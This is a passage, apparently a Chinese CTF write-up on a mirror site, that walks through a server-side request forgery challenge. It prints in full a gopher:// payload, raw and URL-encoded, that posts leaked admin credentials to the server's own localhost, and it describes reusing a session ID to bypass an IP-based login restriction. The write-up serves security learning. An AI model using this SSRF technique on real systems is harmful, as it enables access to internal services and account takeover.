zoukankan      html  css  js  c++  java
  • SSRF攻击-运用gopher协议构造POST包--emmmm(http://10.112.68.215:10004/index.php?action=login)

        还是天枢的一道CTF题,启程!
     
        分析题目,自己注册账户并登陆后,提示输入一个url,网站会自己运行查找网页信息。
        emmmmm,很挑衅,网站就当作服务器,我们在url框中输入一个伪造的执行代码,让他运行获取到机密信息,哼哼。这就是SSRF(服务端请求伪造),伪造的代码留给服务端自己执行并返回我们需要的机密信息。
        在里面乱输入了一些东西,没有任何反馈。此时,我们就要扫描网站啊。
     
    1.扫描网站+分析robots.txt
        使用御剑扫描网站。眼尖得很,看到了“robots.txt”文件。
        robots.txt是一个纯文本文件,它会告诉引擎搜索器哪些资源能搜索,哪些不能。语法如下:
    User-agent: * 星号说明允许所有搜索引擎收录
    Disallow: index.php? 表示不允许收录以index.php?为前缀的链接,比如index.php?a=12
    Disallow: /tmp/ 表示不允许收录tmp目录及其里面的文件,如/tmp/1.html
        来,愉快地查看robots.txt。如下图所示
        嗯呢,不让搜索这俩东西,那就看这俩里面有啥好东西。
     
    2.分析隐藏文件/backup/*和phpinfo.php
        在backup/里面看到一个sql文件,emmmmmmmm,或许存储了有关用户的信息。打开看看。
        看到了,用户名和密码。yeeah
        尝试登陆。有了提示信息,限制了登录的IP和端口。
     
        回想到前面的url框,可以在用已注册用户登录后,在url框中输入伪造的网页登录信息,从而成功用admin用户登录。
     
        第二个隐藏文件phpinfo.php一定隐藏了什么重要的东西。看看
        gopher扩展件是启动着的。它是什么?
        Gopher是Internet上一个很有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便用户获取。Gopher协议使得Internet上的所有Gopher客户程序能够与已注册的Gopher服务器对话。
        它的使用格式是 gopher://URL。
        在SSRF中经常会使用Gopher来构造POST包攻击应用。
     
    3.使用Gopher协议构造POST包
        Gopher协议没有默认端口,需要制定POST方法,回车换行使用%0d%0a,参数之间的分隔符也用URL编码,其他与HTTP协议类似。
        本题中,先根据HTTP协议,构造的结果表示按照要求登录admin用户,如下:
    gopher://127.0.0.1:80/_POST /index.php?action=login HTTP/1.1
    Host:127.0.0.1:1000
    Cookie:PHPSESSID=1f546328759632456215236845122365;
    Connection:close
    Content-Type:application/x-www-form-urlencoded
    Content-Length:null
    Transfer-Encoding:chunked
     
    username=admin&password=bupt666
        其中,必须要有Content-Type,它有两种值:“ application/x-www-form-urlencoded”和“ multipart/form-data”,它主要用于传输参数。如果没有它,参数就不能正常传输。
                  这里phpsessid模仿访问此网站获得的phpsessid随机制作一个即可。例如,此处随机访问网站,
        获取到的phpsessid是8ef96c599289cae82a714af4afafc793,模仿写出一个数位一样的当做phpsessid,可以是1f546328759632456215236845122365。
        经过多次URL编码的结果为:
    gopher://127.0.0.1:80/_POST%20%2findex.php%253Faction%3Dlogin%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A1000%250d%250aCookie%3A%20PHPSESSID%3D1f546328759632456215236845122365%3B%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aContent-Length%3A%2031%250d%250a%250d%250ausername%3Dadmin%26password%3Dbupt666
        此处有些地方经过了多次URL编码,我实在看不出来奥妙,这是个问题,估计要很深的功底才能办到。
        
    4.利用POST包登录admin账户获取flag
        此处的逻辑是,首先使用已注册普通用户登录,在【URL】框中输入POST包,此时POST包中的phpsessid成为admin用户的phpsessid,里面储存了admin用户的所有登录信息。根据题目本身可知,在登陆界面因为IP和端口的限制不能直接登录admin用户,所以先登录普通用户,拦截普通用户的一个请求包,将它的phpsessid修改为admin用户的phpsessid,这样就绕过了登录时的拦截,将普通用户替换为admin用户登录,成功获得flag。
        点击【Forward】,又返回信息,说明跳转页面成功,admin账户成功登录了,那个phpsessid已经成为admin用户的唯一标识。如下图所示
        之后随便登录一个已注册用户,将admin用户的唯一标识phpsessid输入进去,即可获得flag。如下图所示、
        点击【Forward】,获得flag。
     
     
     
     
     
     
     
     
     
     
     
     
     
  • 相关阅读:
    PLSQL Developer个性化设置
    MyEclipse个性化设置
    log4j:WARN No appenders could be found for logger
    spring调用方法(接口和多个实现类的情况)
    配置tomcat报错: Unknown version of Tomcat was specified.
    软件设计模式六大原则
    Java中子类是否可以继承父类的static变量和方法而呈现多态特性
    网络端口集合
    [OJ] Permutation Index
    [OJ] Matrix Zigzag Traversal
  • 原文地址:https://www.cnblogs.com/HYWZ36/p/10295548.html
Copyright © 2011-2022 走看看